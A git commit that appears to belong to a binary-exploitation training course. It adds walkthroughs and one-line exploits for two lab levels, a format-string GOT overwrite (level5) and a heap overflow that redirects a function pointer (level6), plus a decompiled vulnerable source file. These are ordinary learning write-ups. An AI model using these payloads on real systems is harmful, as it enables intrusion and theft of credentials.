level5 and level6 done

2025-04-29 14:00:03 +02:00 · 2025-04-29 14:00:03 +02:00 · fc40e2e002
commit fc40e2e002
parent 32cdde848f
5 changed files with 51 additions and 0 deletions
--- a/level5/ressources/exploit
+++ b/level5/ressources/exploit
@ -0,0 +1 @@
+(python -c 'print "\x38\x98\x04\x08" + "%134513824p" + "%4$n"'; cat) | ./level5
--- a/level5/walkthrough
+++ b/level5/walkthrough
@ -0,0 +1,14 @@
+# Level5
+
+Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`.
+This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables).
+Our goal here will be to change the value of the `jmp` of `exit()` to the address of `o()`, opening a shell.
+
+To do so, we will first dump the stack to know where the buffer is located. 
+Let's print something basic like `print("AAAA" + "%x"*20)`. We can see that 0x41414141 (= "AAAA") is printed at the 4th position in the stack.
+Now that we know where our buffer is located on the stack, let's exploit printf.
+
+By using the `%n` flag, we can change the value of a variable to the length of what's been printed before (here, o's address).
+We can get both `jmp` instruction's address and `o`'s address using gdb.
+Putting these all together, here is the command:
+`(python -c 'print "\x38\x98\x04\x08" + "%134513824p" + "%4$n"'; cat) | ./level5`
--- a/level6/ressources/exploit
+++ b/level6/ressources/exploit
@ -0,0 +1 @@
+./level6 $(python -c 'print "A"*72 + "\x54\x84\x04\x08"')
--- a/level6/source.c
+++ b/level6/source.c
@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void n(void)
+{
+	system("/bin/cat /home/user/level7/.pass");
+}
+
+void m(void)
+{
+	puts("Nope");
+}
+
+int main(int ac, char **av)
+{
+	char *buf;
+	void (**fn_ptr)(void);
+
+	buf = (char *)malloc(64);
+	fn_ptr = (void (**)(void))malloc(4);
+	*fn_ptr = m;
+	strcpy(buf, av[1]);
+	(*fn_ptr)();
+	return 0;
+}
--- a/level6/walkthrough
+++ b/level6/walkthrough
@ -0,0 +1,9 @@
+# Level6
+
+Using ghidra, we can decompile the code and see that it calls `malloc` twice.
+The first malloc has a size of 64 bytes and is a buffer where the program will `strcpy(buf, av[1])`. The second one is a function pointer pointing to `m()` function by default (prints "Nope."). We want to change its value to point to the correct function `n()` that will open a shell.
+To achieve this, we will overflow the first malloc and the second one's header so that we can write the adress through the input in `av[1]`.
+To calculate the offset between the 2 allocations, we used gdb's breakpoints and prints, leading us to an offset of 72 bytes (64 + 8).
+
+Here is the command:
+./level6 $(python -c 'print "A"*72 + "\x54\x84\x04\x08"')
				`@ -0,0 +1 @@`
				`(python -c 'print "\x38\x98\x04\x08" + "%134513824p" + "%4$n"'; cat) \| ./level5`
				`@ -0,0 +1 @@`
				`./level6 $(python -c 'print "A"*72 + "\x54\x84\x04\x08"')`